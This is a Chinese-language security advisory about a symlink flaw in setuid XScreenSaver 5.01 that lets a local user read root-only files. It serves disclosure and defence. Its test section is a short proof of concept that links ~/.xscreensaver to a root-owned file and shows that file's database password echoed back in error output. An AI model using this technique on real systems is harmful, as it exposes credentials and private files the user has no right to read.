漏洞起因
设计错误
影响系统
Xscreensaver Xscreensaver 5.01
不受影响系统
危害
本地攻击者可以利用漏洞获得敏感信息。
攻击所需条件
攻击者必须访问XScreenSaver所在系统。
漏洞信息
XScreenSaver是X窗口系统的一套屏保程序和屏保框架。
XScreenSaver存在符号连接攻击,本地攻击者可以利用漏洞获得敏感信息。
Xscreensaver默认设置setuid位,Xscreensaver程序使用文件~/.xscreensaver读取配置选项,如果文件符号连接到其他文件上,那么此文件信息可被输出并显示,导致敏感信息泄漏。
测试方法
kcope@opensolaris:~# ls -la /root/db.php && cat /root/db.php
-rw——- 1 root root 61 Dez 27 17:59 /root/db.php
$db_user = "root";
$db_pass = "secret";
kcope@opensolaris:~$ ln -s /root/db.php ~/.xscreensaver
kcope@opensolaris:~$ ls -la ~/.xscreensaver
lrwxrwxrwx 1 kcope staff 12 1986-12-27 18:01 /export/home/kcope/.xscreensaver -> /root/db.php
kcope@opensolaris:~$ xscreensaver -verbose
xscreensaver 5.01, copyright (c) 1991-2006 by Jamie Zawinski <jwz@jwz.org>.
xscreensaver: running as kcope/staff (101/10); effectively root/staff (0/10)
xscreensaver: in process 2186.
xscreensaver: /export/home/kcope/.xscreensaver:1: unparsable line: $db_user = "root";
xscreensaver: /export/home/kcope/.xscreensaver:2: unparsable line: $db_pass = "secret";
xscreensaver: 18:02:26: running /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper: No such file or directory
xscreensaver: 18:02:26: /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper did not report a GL visual!
……………………………
……………………………
……………………………
厂商解决方案
目前没有解决方案提供:
http://www.jwz.org/xscreensaver/
漏洞提供者
Nikolaos Rangos
0 条评论。